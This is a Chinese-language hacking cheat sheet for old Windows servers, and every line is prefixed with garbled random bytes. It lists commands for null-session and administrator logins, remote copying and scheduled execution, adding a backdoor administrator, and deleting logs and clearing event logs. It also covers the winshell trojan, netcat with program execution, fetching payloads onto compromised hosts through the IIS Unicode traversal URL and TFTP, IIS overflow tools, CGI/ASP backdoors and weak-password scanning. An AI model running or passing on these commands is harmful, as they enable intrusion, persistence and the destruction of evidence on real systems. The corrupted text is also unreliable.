网管和黑客都必须知道的命令
.1q}m��w � 常用的几条NET命令:
E*�u�*LM�m ?�].Mn�wYo (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
n|�{#�5�#� �I8�YUq��� (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
TIxOMY�y�� ,�f2o�O?L} (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
�B�,��cFvS $L��8>Ha�} (查看远程主机时间) net time \\IP地址
y�^,Q�M[�& `!/[9Y#H�p (定时启动某个程序) at \\IP地址 02:18 readme.exe
"�:��8\2Qp Dt�F��Hh/X (查看共享) net view \\IP地址
MzX&|wimb� �o0]YDX@T (查看netbios工作组列表) nbtstat -A IP地址
O7Jux-E�1C Q(]m��1\a� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
)��\�#*~73 9�e=�}P�L� (这两条把自己增加到管理员组): net user 用户名 密码 /add
60vmjm�X�l [9${4=�K�q net localgroup Administrators 用户名 /add
�953qz]Q�8 3f�hY+�$tq (断开连接) net use \\IP地址\ipc$ /delete
g��ns}%\, rP3tFvOH�� 扫尾:
>�jsY'Bm� hq�vhnqQk del C:\winnt\system32\logfiles\*.*
Tc�/^h�4xH ��?!P0UTe~ del C:\winnt\ssytem32\config\*.evt
<�7VLUk}�� /iFn�=pk1? del C:\winnt\system32\dtclog\*.*
�qC> �tni% <Z:FY|�'s� del C:\winnt\system32\*.log
����\jwG*a c$�!?4z�_. del C:\winnt\system32\*.txt
Ks��P2�./N bR�x�I7 '� del C:\winnt\*.txt
P!W%KobZ7| ;��
R}>SS' del C:\winnt\*.log
'z;�(Y*jb� 'v��d&r�@N 一、netsvc.exe
�pPBX�Uu�' s#s">hM�rI 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
F<,pAxl~�@ ?.�S���Gn[ netsvc /list \\IP地址
g:M;S"U3*Y E2'Wzrovlo netsvc schedule \\IP地址 /query
�i��k(D�u/ ��{Nl�?�� netsvc \\IP地址 schedule /start
HLW_Y|QaFo 9 8|sWI3�B 二、OpenTelnet.exe
@KTu�G ?�. H%�O\�4V2s 远程启动主机的Telnet服务,并绑定端口到7878,例如:
ed,A'�S=�d �+c))�fPuV OpenTelnet \\IP地址 用户名 密码 1 7878
�}�ssV�"5M HD�H�G~<s� 然后就可以telnet到主机的7878端口,进入DOS方式下:
v�0\l�~_|H rkj�nw@x\� telnet IP地址 7878
C�M_hN>%w[ ;d6Dm)�/(� 三、winshell.exe
�0�V�1GX~2 W#�F�9�Qw 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
�_"1Ri�dhH �^aSb~l�ce p Path (查看winshell主程序的路径信息)
NfvPE�]S�� Y�)1/f�EM� b reBoot (重新启动机器)
�=\O#F88ui OT
0c��5x� d shutDown (关闭机器)
F@u7Oel@�m s(=w�G|��� s Shell (执行后你就会看到可爱的“C:\>”)
pN�[WYM�?[ Vg��m'&Y�T x eXit (退出本次登录会话,此命令并不终止winshell的运行)
�M@cFcyk�K sF
{,n�0<8 CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
7l53&�,s � �.��$&^y�p 四、3389登陆器,GUI方式登录远程主机的
qq5�X3K�2& Rs�Z���j�� 五、elsave.exe
?@ oF@AEx= Hh%�!4_AMw 事件日志清除工具
pp@
O��wpb v�$]B;;[A� elsave -s \\IP地址 -l "application" -C
0vv�~G\yM� �p�/ �ITg elsave -s \\IP地址 -l "system" -C
u_k[<�&�$�
�]=�~�dyi elsave -s \\IP地址 -l "security" -C
_9h$�8(wjn e�$~�[\�
w 执行后成功清除应用程序日志,系统日志,安全日志
izl6L���� aFT�W�zz�� 六、hbulot.exe
h!�w::c��V ��DG;7+�2U 开启win2kserver和winxp的3389服务
$�r�!CQ�2S M6g8+��sio hbulot [/r]
&&��&-P\3 A�Q'�%}(#0 使用/r表示安装完成后自动重起目标使设置生效。
]D�N�P�G"� $XF$ n#ua� 七、nc.exe(netcat.exe)
p�l]|yI��Z HA,o2jZ?In 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
c]^�P�$F8U Af _4Z]F
想要连接到某处: nc [-options] hostname port[s] [ports] ...
�QC+
Z6WS; +h�N�>Q�$E 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
�?h}N�L5a� 3x[C�p�g, 参数:
��,�\M7�7V (tg.]q�_=u -e prog 程序重定向,一旦连接,就执行 [危险!!]
;5tOQ&p%v� 4zy�Q�"?A~ -g gateway source-routing hop point[s], up to 8
���L��8`v� �9B0�ON*`� -G num source-routing pointer: 4, 8, 12, ...
�N68mvB�e� n����j��s: -h 帮助信息
A*OqUq/H`; m4/qxm"Dx: -i secs 延时的间隔
^-"��I�w�y mh�3S?�Uc -l 监听模式,用于入站连接
~Zr}Q�O}G� b G�:\*1T� -n 指定数字的IP地址,不能用hostname
P7��3GH��� �w�M��VUTm -o file 记录16进制的传输
N���H/A`Wm gv`_��+E{P -p port 本地端口号
�a�3�yN�d
-.h��)CM@L -r 任意指定本地及远程端口
5�Y *4a�%" {[!<yUJ`S# -s addr 本地源地址
�oz�RO:*51 ���c���e;7 -u UDP模式
��=AN�r�|d �_�KM?�
?& -v 详细输出——用两个-v可得到更详细的内容
�=dAAb�\:� ���!8G)`�' -w secs timeout的时间
j�Y�V�s\h6 �uRb4�8Qy2 -z 将输入输出关掉——用于扫描时
/�WnCAdDgZ 八、TFTPD32.EXE
{xZ�Y4b2�� P�h=NH8� 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
ps�<�E��f� !�,`'VQ�w$ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
bLg!LZ|S0s sB�adiDG~9 然后可以直接令文件运行:
g7zl5^o3�j a/�V,iCiH� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
FsE�D�9+/m 5=?P�6I_$G 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
�,��?8a3%� 0
P��YY�G 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
z�/J?!�e�e |?88EG@0�5 一、一 Xscan命令行运行参数说明:
,!{8@*!=s ��1?.CXq�K 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
')q0Vaoh�C q9��vND[BQ 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
F7<mm7BG�Z M+�&~sX*a xscan -file <主机列表文件名> <检测项目> [其他选项]
|XB<�vj07G 8w:a�y,��= 其中<检测项目> 含义如下:
wH|%3��@eJ �J2�Dn���� -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
�l�i%@HdA! g�k��mof�^ -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
�4#�(/{6�J Iy_5k��8�] -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
$[X��]�[[ |�5vJ:'`�I -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
\�aJ��>? � WXx�nOLJr -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�EGD{��n�E j55_wx@cA [其他选项] 含义如下:
e`0C0��GaP v�l�/�!w�2 -v: 显示详细扫描进度
vGi<" Sn7 ��V=ll� 9M -p: 跳过Ping不通的主机
^��KbR@A�h HB�� )+.e� -o: 跳过没有检测到开放端口的主机
.�f$2-�5�q ��;l%xjMcU -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
